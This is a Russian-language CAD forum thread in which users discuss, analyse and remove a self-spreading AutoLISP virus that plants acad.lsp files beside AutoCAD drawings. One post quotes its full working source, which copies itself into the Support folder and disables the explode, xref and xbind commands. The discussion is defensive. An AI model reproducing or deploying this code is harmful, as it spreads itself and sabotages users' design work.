Вирус для Автокада
Реклама i
| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Вирус для Автокада

Ответ
Поиск в этой теме
Непрочитано 24.05.2007, 22:57 #1
Вирус для Автокада
dextron3
 
проектировшик
 
СССР
Регистрация: 01.01.2007
Сообщений: 5,149

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
__________________
инженер проектировшик с опттом программа авто гад образование высшие

Последний раз редактировалось Кулик Алексей aka kpblc, 26.02.2015 в 15:02.
Просмотров: 196158
 
Автор темы   Непрочитано 24.05.2007, 23:00
#2
dextron3

проектировшик
 
Регистрация: 01.01.2007
СССР
Сообщений: 5,149


Если у кого есть возможность протестить данный вирус, или кто уже сталкивался с этим, просьба посочувст... ой поделиться решением проблемы :roll:
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 24.05.2007, 23:05
#3
ppv

инженер
 
Регистрация: 05.08.2006
Самара
Сообщений: 258


А что ты предлагаешь?
Всем, кто не боится, открыть твой архив? При условии, что уже известно что его ловит только последний антивирус.
Спасибо за новость, но проверять ее не буду :roll:
ppv вне форума  
 
Непрочитано 24.05.2007, 23:09
#4
Alaspher


 
Регистрация: 11.10.2004
e•burg
Сообщений: 755


Симантек его видит и лечит - ничего страшного (скрипт).
ALS.Bursted.A
Alaspher вне форума  
 
Автор темы   Непрочитано 24.05.2007, 23:11
#5
dextron3

проектировшик
 
Регистрация: 01.01.2007
СССР
Сообщений: 5,149


В архиве маленкий ЛИСП файлик просто
поюзать его, если знаешь лисп язык
посмотреть, он сам по себе безобидный
но только с ДВЖ файлами совместно не запускай
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Автор темы   Непрочитано 24.05.2007, 23:12
#6
dextron3

проектировшик
 
Регистрация: 01.01.2007
СССР
Сообщений: 5,149


NOD 32 ВИДИТ!

А ПОЧЕМУ КАСПЕРСКИЙ НЕ ЗАМЕЧАЕТ ВОД БЕДА
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 24.05.2007, 23:47
#7
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,968


Ну если все скрипты запускать то вще кердык мона получить.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 25.05.2007, 00:20
#8
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Вот вам несколько вариантов лекарств:
1. Установить системную переменную ACADLSPASDOC в 0
2. В меню исправить вызовы с _xref, _explode, _xbind на _.xref, _.explode, _.xbind соответвенно
3. На кнопку повесить код типа:
Код:
[Выделить все]
^C^C^P(mapcar '(lambda(x) (command "_.redefine" x)) '("xref" "explode" "xbind"));
Скажу честно, работоспособность ни одного из способов не проверял.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 25.05.2007, 00:24
#9
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,968


kpblc
А ты чего себе интернет установил дома.
ГЫЫ
А ты по пробуй свой код то.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 25.05.2007, 00:25
#10
Pilot

Проектировщик свиноводство
 
Регистрация: 21.08.2003
Сообщений: 2,291


Цитата:
Здравствуйте!

Я - компьютерный вирус.
Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру.

Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.
Pilot вне форума  
 
Непрочитано 25.05.2007, 00:28
#11
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


> DEM : Ага, протянул. Правда, скорость хреноватая (немногим быстрее диалапа), но все лучше чем ничего.
Насчет опробовать - вот веришь, не до того!
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 25.05.2007, 05:55
#12
Profan


 
Регистрация: 25.12.2005
Москва
Сообщений: 13,627


Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.
Profan вне форума  
 
Автор темы   Непрочитано 25.05.2007, 08:24
#13
dextron3

проектировшик
 
Регистрация: 01.01.2007
СССР
Сообщений: 5,149


Цитата:
Сообщение от Profan
Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.
Так еще при запуске он генерирует такой же ЛИСП файл в папке SUPPORT автокада и уже сидит там, как основной вирус, некоторые думают что просто удалил файл acad.lisp с принесенным файлом и все, но нужно проверить ДИСК С, потомучто иногда компьютер еще ранее заражен
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 25.05.2007, 10:01
#14
ShaggyDoc

Thượng Tá Quân Đội Nhân Dân Việt Nam
 
Регистрация: 14.03.2005
44d32'44"С, 33d26'51"В
Сообщений: 13,372


Цитата:
...во все проектных фирмах все автокадовские файлы заражены вирусом ...
Детские "страшилки" про "зеленую скамеечку" ...
ShaggyDoc вне форума  
 
Непрочитано 25.05.2007, 10:09
#15
Кочетков Андрей

Java/Kotlin/Go
 
Регистрация: 03.02.2006
Сообщений: 5,787


Это не вирус.
Просто кто-то таким образом пытался защитить свои файлы от редактирования и дальнейшего использования )))
Кочетков Андрей вне форума  
 
Непрочитано 25.05.2007, 10:12
#16
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,788
Отправить сообщение для T-Yoke с помощью Skype™


Ну вот текст этого файла, и кто скажет, что здесь вредоносного?
------------------------------------------------------------------------------
(defun s::startup(/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path)8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn
(while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)
(if (= (substr ns1 8 7) "acadapp")
(setq lspbj 1)
)
)
(close wjm)
)
)
(if (and (= acadpath dwgpath)
(/= acadpath path))
(progn
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "acadapp.lsp"))
(if (= lspbj 0)
(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line (strcat "(load" (chr 34) "acadapp" (chr 34)")") wjm)
(write-line "(princ)" wjm)
(close wjm)
)
)
(writeapp)
)
(progn
(if (/= nowdwg "Drawing.dwg")
(progn
(setq oldacad (findfile "acadapp.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
)
)
)
)
(command "undefine" "explode")
(command "undefine" "xref")
(command "undefine" "xbind")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun writeapp()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while (setq wz (read-line wjm))
(write-line wz wjm1)
)
(close wjm)
(close wjm1)
)
)
)
(defun C:explode (/ p cont old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p(ssget))
(if p
(progn
(setq cont (sslength p))
(princ "\nSeltct objects:")
(princ cont)
(princ "found")
(princ "\n")
(princ cont)
(princ "was not able to be explode")
)
)
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xref(/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)

-------------------------------------------------------------------------
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Автор темы   Непрочитано 25.05.2007, 10:26
#17
dextron3

проектировшик
 
Регистрация: 01.01.2007
СССР
Сообщений: 5,149


а из за чего тогда антивирь ругаеца
__________________
инженер проектировшик с опттом программа авто гад образование высшие
dextron3 вне форума  
 
Непрочитано 25.05.2007, 10:26
#18
Кочетков Андрей

Java/Kotlin/Go
 
Регистрация: 03.02.2006
Сообщений: 5,787


Переопределяются некоторые команды.
Кочетков Андрей вне форума  
 
Непрочитано 25.05.2007, 11:27
#19
Alaspher


 
Регистрация: 11.10.2004
e•burg
Сообщений: 755


Цитата:
Сообщение от dextron3
а из за чего тогда антивирь ругаеца
Изза того, что кто-то, совершенно справедливо, пожаловался антивирусникам на зловредный код, а они включили его в свои базы.
Alaspher вне форума  
 
Непрочитано 25.05.2007, 11:45
#20
shnn

Инженер
 
Регистрация: 18.02.2005
Самара
Сообщений: 747


2 T-Yoke
вот что:
Код:
[Выделить все]
(command "undefine" "explode") 
(command "undefine" "xref") 
(command "undefine" "xbind")
А вообще считаю что это злая шутка над коллегами случайно вырвалась на свободу за пределы офиса.
shnn вне форума  
 
Непрочитано 25.05.2007, 13:09
#21
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Эта "злая шутка, вырвавшаяся за пределы офиса", уже и до Казахстана дошла - мне оттуда с полгода назад примерно на это дело жаловались
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 25.05.2007, 13:17
#22
Rost

Инженер-Архитектор
 
Регистрация: 20.03.2005
Сообщений: 776


Спасибо!
Весч оч полезная, будем ее прилагать к файлу!
Rost вне форума  
 
Непрочитано 25.05.2007, 14:10
#23
AIK

Заказчик
 
Регистрация: 20.02.2004
Москва
Сообщений: 2,758


Спасибо! Буду знать кому нельзя заказывать халтуру!
AIK вне форума  
 
Непрочитано 25.05.2007, 14:11
#24
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Пользуйтесь локализованным Автокадом, и никакая зараза к вам не пристанет.
Это я к тому, что команды записаны без префикса и в русском Автокаде выполняться не будут.
VVA вне форума  
 
Непрочитано 25.05.2007, 14:25
#25
gh5rjn

умею проводить линии
 
Регистрация: 11.10.2005
Россия
Сообщений: 292


Цитата:
Сообщение от VVA
... в русском Автокаде ...
Это в Компасе что ли. Тамто точно не будут.
gh5rjn вне форума  
 
Непрочитано 25.05.2007, 17:32
#26
Krieger

инженер (КМ)
 
Регистрация: 30.10.2004
Красноярск
Сообщений: 3,837


Подумаешь, команду переопределили...
Можно ведь было и другое прописать в прогу, например:
_select all,
_erase все на@ен,
_purge на всякий пожарный,
_qsave,
Ну и кад закрыть после этого...
Krieger вне форума  
 
Непрочитано 25.05.2007, 17:56
#27
Om81

Хочу быть фотографом :)
 
Регистрация: 21.10.2005
Москва, Кисловодск
Сообщений: 2,538
<phrase 1=


Цитата:
Сообщение от Кулик Алексей aka kpblc
Эта "злая шутка, вырвавшаяся за пределы офиса", уже и до Казахстана дошла - мне оттуда с полгода назад примерно на это дело жаловались
Так вроде:
Цитата:
dextron3



Фотограф

Зарегистрирован: 01.01.2007
Сообщения: 90
Откуда: г. Алматы
- как раз)
Мне одно не очень понятно - теперь и фотографы увлекаются Автокадом? Так Фотошоп вроде удобней.. и РАВы понимает)
=))
Om81 вне форума  
 
Непрочитано 25.05.2007, 19:40
#28
Alan

CAD
 
Регистрация: 28.08.2003
Киев
Сообщений: 1,834
<phrase 1=


Да было уже это. Немного обсуждали.
http://www.autocad.ru/cgi-bin/f1/board.cgi?t=26139Fh
__________________
По теории майский жук летать не может.
Но он этого не знает. И летает...
Alan вне форума  
 
Непрочитано 26.05.2007, 08:13
#29
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,788
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от shnn
2 T-Yoke
вот что:
Код:
[Выделить все]
(command "undefine" "explode") 
(command "undefine" "xref") 
(command "undefine" "xbind")
...
Я так и подумал, что дело в переопределении команд, спасибо!
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 14.02.2008, 14:00
#30
Леонид Ильич

проектировщик СС
 
Регистрация: 13.02.2008
Москва
Сообщений: 230


Цитата:
Сообщение от Pilot Посмотреть сообщение
Здравствуйте!

Я - компьютерный вирус.
Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру.

Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.
Вирус с ошибкой: нужно сначала рассылать по почте, а уже потом стирать файл.
Леонид Ильич вне форума  
 
Непрочитано 04.03.2008, 10:18
#31
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Я так и не понял, как вирус распостраняется? У нас постоянно он где-то проявляется - вывести не могут. Хотя антивирус его находит - но приходиться запускать чтоб весь комп проверил - он чтото удалит и все. Хочетелолсь бы знать как он распостраняется и как работает. Может есть ручная защита или ручное удаление. Антивирус долго гоняет и тормозит машину.
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 10:32
#32
Profan


 
Регистрация: 25.12.2005
Москва
Сообщений: 13,627


Цитата:
Я так и не понял, как вирус распостраняется?
Если речь идет о файле acad.lsp, то он распространяется (копируется) автоматически при открытии любого файла DWG. Таково его свойство. AutoCAD ищет этот файл в путях доступа и в рабочей папке и неминуего сам запускает его. Для удаления его не надо даже запускать антивирус. Можно хотя бы в Total Commander по маске найти эти файлы и уничтожить. Если только он не используется для служебных целей. Тогда можно один файл из папки Support оставить и вычистить его.
Profan вне форума  
 
Непрочитано 04.03.2008, 11:36
#33
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Если я правильно понял "вирус" работает так:
Для начала нужен файл acadapp.lsp - он записывается в C:\Documents and Settings\user\Application Data\Autodesk\AutoCAD 2008\R17.1\enu\Support может програмно а може вручную. Потом вместе с файлом идет acad.lsp в котором есть копия этого acadapp.lsp. И при удалении acad.lsp он востанавливается и готов к применению. Т.е. "не зараженный " компутер запустив единожды acad.lsp делает копию acadapp.lsp. Так?
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 11:46
#34
Profan


 
Регистрация: 25.12.2005
Москва
Сообщений: 13,627


Для запуска acad.lsp не нужно никакого файла acadapp.lsp.
Profan вне форума  
 
Непрочитано 04.03.2008, 11:50
#35
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Разобрался.
Для работы "вируса" нужен только файл acad.lsp (архив см. 1 посте)
При запуске акада выполняется код который там прописан. Но главное это то что в папке Support появляются acad.lsp с кодом
Код:
[Выделить все]
(load"acadapp")(princ)
который загружает acadapp.lsp.
Ну и получается удаляй не удаляй из рабочей папки файл acad.lsp он всеравно восстановиться из acadapp.lsp
Я конечно не америку открыл. Но во всяком случае схема понятна
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 12:19
1 | #36
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Про тот же вирус на caduser.ru
http://www.caduser.ru/cgi-bin/f1/board.cgi?t=39100wW
1. Если для своих задач не используешь acad.lsp, то в Тотал командоре ищешь все файлы acad.lsp и acadapp.lsp и удаляешь.
2. Редактируешь свое меню, перед переопределяемыми командами ставишь точку
- вместо _EXPLODE - _.EXPLODE
- вместо _XREF - _.XREF
- вместо _XBIND - _.XBIND
Точка перед именем команды вызывает оригинальную команду Автокада, даже если она была до этого 100 раз переопределена.
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 04.03.2008, 12:26
#37
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


У меня этот вирус всеравно не работал. Акад русский и команды эти в сад идут. Просто всем надоели эти файлы acad.lsp в папках.
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 12:37
#38
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Ну так примени п.1
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 04.03.2008, 12:50
#39
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


От вируса избавиться не проблема (мне во всяком случае). Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 12:51
#40
Солидворкер
Moderator

Конструктор (машиностроение)
 
Регистрация: 23.10.2006
Россия
Сообщений: 23,283
<phrase 1=


Цитата:
Сообщение от Shoorup Посмотреть сообщение
От вируса избавиться не проблема (мне во всяком случае). Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.
Для этого его и внесли в антивирусные базы.
Солидворкер вне форума  
 
Непрочитано 04.03.2008, 13:06
#41
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Вот решение от данного вируса. Но жаль от возможных модификаций не лечит.
Цитата:
apetim (2008-02-26 17:42:20)

можно просто в пути создания вирусом файла acad.lsp
(а именно — там где у вас base.dcl — по умолчанию это путь типа C:\Documents and Settings\*username*\Application Data\Autodesk\AutoCAD 2006\R16.2\enu\Support\)
уже создать такой файл, задав ему в свойствах — только чтение (read-only).

в таком случае вирус , пытаясь создать файл acad.lsp, обламывается и не может загружать и распространять себя впоследствии.
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 04.03.2008, 13:41
#42
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Ага, особенно
Цитата:
Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.
Для неопытного пользователя проще найти все файлы acad.lsp acadapp.lsp и удалить их, включая модификации вируса.
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 05.03.2008, 21:35
#43
v110018


 
Регистрация: 05.03.2008
Сообщений: 3


действительно NOD его видит
v110018 вне форума  
 
Непрочитано 06.03.2008, 04:39
#44
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


Avira и Dr.Web тоже его видят и удаляют.
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 06.03.2008, 10:59
#45
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Ну и что, каждый раз будите гонять ноды и докторов? Не проще ли избавиться просто сделав так, чтоб он не распостранялся?
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 06.03.2008, 11:11
#46
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


Цитата:
Сообщение от Shoorup Посмотреть сообщение
Ну и что, каждый раз будите гонять ноды и докторов? Не проще ли избавиться просто сделав так, чтоб он не распостранялся?
Да я совсем и не против... Написал это только к вопросу: Видит - Не видит...
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 06.03.2008, 11:14
#47
favorite

инженер
 
Регистрация: 05.12.2005
Москва
Сообщений: 425


AVG тоже видет.
favorite вне форума  
 
Непрочитано 24.04.2008, 10:07
#48
Severe_dude

сферический конь в вакууме
 
Регистрация: 02.05.2006
с Вологды
Сообщений: 307
<phrase 1=


Знакомые поймали гдето "типа вирус" под акад, скорее просто злая шутка, на всех печатаемых чертежах в нижнем левом углу печатает на рыжем фоне Слово "Привет!!!" и улыбающуюся рожу. Никто не сталкивался?
__________________
Наша игра - Самая игра! :D
Severe_dude вне форума  
 
Непрочитано 24.04.2008, 10:56
#49
asys

архитектор
 
Регистрация: 10.08.2005
Ростов-на-Дону
Сообщений: 5,345


а можешь мне в почту его прислать , forxlam@yandex.ru?
asys вне форума  
 
Непрочитано 24.04.2008, 11:01
#50
ivan.solo

инженер по конструкциям
 
Регистрация: 14.01.2006
Москва
Сообщений: 110
<phrase 1= Отправить сообщение для ivan.solo с помощью Skype™


вирус куснул меня - ну дела!
ivan.solo вне форума  
 
Непрочитано 01.07.2008, 21:02
#51
asys

архитектор
 
Регистрация: 10.08.2005
Ростов-на-Дону
Сообщений: 5,345


мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство
Вложения
Тип файла: rar acad.rar (3.7 Кб, 448 просмотров)
asys вне форума  
 
Непрочитано 01.07.2008, 22:39
#52
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Найти все эти файлы и уничтожить. Создать пустой файл acad.fas в каталоге, где находится acad.exe и дать ему свойство ReadOnly.
fas практически невозможно "вскрыть".
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 02.07.2008, 09:58
#53
misht

градостроительство
 
Регистрация: 11.01.2007
С-Пб
Сообщений: 77
<phrase 1=


Вобще у нас 7 каспер спокойно увидел (7.0.0.125)
misht вне форума  
 
Непрочитано 22.07.2008, 21:05
#54
MMH

учеба
 
Регистрация: 17.05.2007
Бермудские острова
Сообщений: 43


перепробывал, все методы, ничего неполучилось, потом скопировал с незараженного компьтера папку support, заменил у себя эту папку, и поставил для чтения, пока работает, без глюков.
MMH вне форума  
 
Непрочитано 22.07.2008, 21:50
#55
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Не разводи паникуMMH, этот вирус безобидный! Вот если его немного модифицировать... а возможно у тебя уже и модификация... В любом прочитай еще раз внимательно весь топик тут есть описание как избавиться от него раз и навсегда
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 06.08.2008, 19:36
#56
Antoha86


 
Регистрация: 29.07.2008
Сообщений: 19


все можно сделать проще. удаляете автокад в установке и удалении, потом ищете все файлы acaddoc в поиске с учетом системных и скрытых папок и удаляете все эти файлы. заново устанавливаете автокад и все нормально. только заново его не поймайте
Antoha86 вне форума  
 
Непрочитано 07.08.2008, 12:24
#57
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Antoha86 ничего глупее не слышал. AutoCAD то зачем удалять? Проблему решили простой установкой "только чтение"! Чего еще мудрить?
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 07.08.2008, 13:55
#58
Natali m

Архитектура
 
Регистрация: 06.08.2007
Алматы
Сообщений: 15


А можно поточнее насчет повесить код на кнопку?
Natali m вне форума  
 
Непрочитано 07.08.2008, 13:56
#59
ShaggyDoc

Thượng Tá Quân Đội Nhân Dân Việt Nam
 
Регистрация: 14.03.2005
44d32'44"С, 33d26'51"В
Сообщений: 13,372


Слышали. Некоторые Windows предлагают переустанавливать
ShaggyDoc вне форума  
 
Непрочитано 07.08.2008, 14:08
#60
Natali m

Архитектура
 
Регистрация: 06.08.2007
Алматы
Сообщений: 15


Напишите, пожалуйста, как "повесить код на кнопку". У меня не получается.
Natali m вне форума  
 
Непрочитано 07.08.2008, 14:14
#61
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Natali m, не пиши никогда 2 раза одно и тоже сообщение. Какой код тебе нужно повесить на конопку? О чем ты ? Макрос? Что не получается? Что делаешь, чтобы получилось?
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 07.08.2008, 14:26
#62
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


http://dwg.ru/art/2
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 12.08.2008, 09:48
#63
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


Так если антивирус не видит, Что мне сделать, чтобы все норм работало?

Последний раз редактировалось Кулик Алексей aka kpblc, 12.08.2008 в 10:34.
b_1 вне форума  
 
Непрочитано 12.08.2008, 09:58
#64
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


b_1, просто прочитаю эту тему полностью и всё!!!
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 12.08.2008, 11:03
#65
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


я так и не вижу решения проблемы, может можно сам файл вируса с диска c: удалить, знать бы где он находиться, я хочу вернуть работу автокада в прежнее положение.
b_1 вне форума  
 
Непрочитано 12.08.2008, 13:32
#66
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


вобщем я ввел в поиск acad.lsp и удалил все что нашлось,
вроде все хорошо работает, Нужно ли мне редактировать свое меню, и если нужно то как это сделать?
b_1 вне форума  
 
Непрочитано 12.08.2008, 13:37
#67
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


Ну и еще проблема. Есть така штука в автокаде - ПУЛЬТ УПРАВЛЕНИЯ.
Так вот она очень удобна для работы в 3d пространстве(2008асаd)
Я на этом пульте упраления делаю нужные себе панели упраления , ну и
работаю. А когда закрываю автокад и сахожу заново, то пульт
упраления пуст, приходится заново его настраивать. т.е. он не запоминает, а сначала все работало нормально (это как проблема с
filedia (1)) Заранее С П А С И Б.
b_1 вне форума  
 
Непрочитано 12.08.2008, 13:50
#68
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Последний пост не имеет никакого отношения к вирусу. Я, если честно, не очень понял: а что хотелось спросить-то?
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 12.08.2008, 13:52
#69
Хмурый


 
Регистрация: 29.10.2004
СПб
Сообщений: 16,379


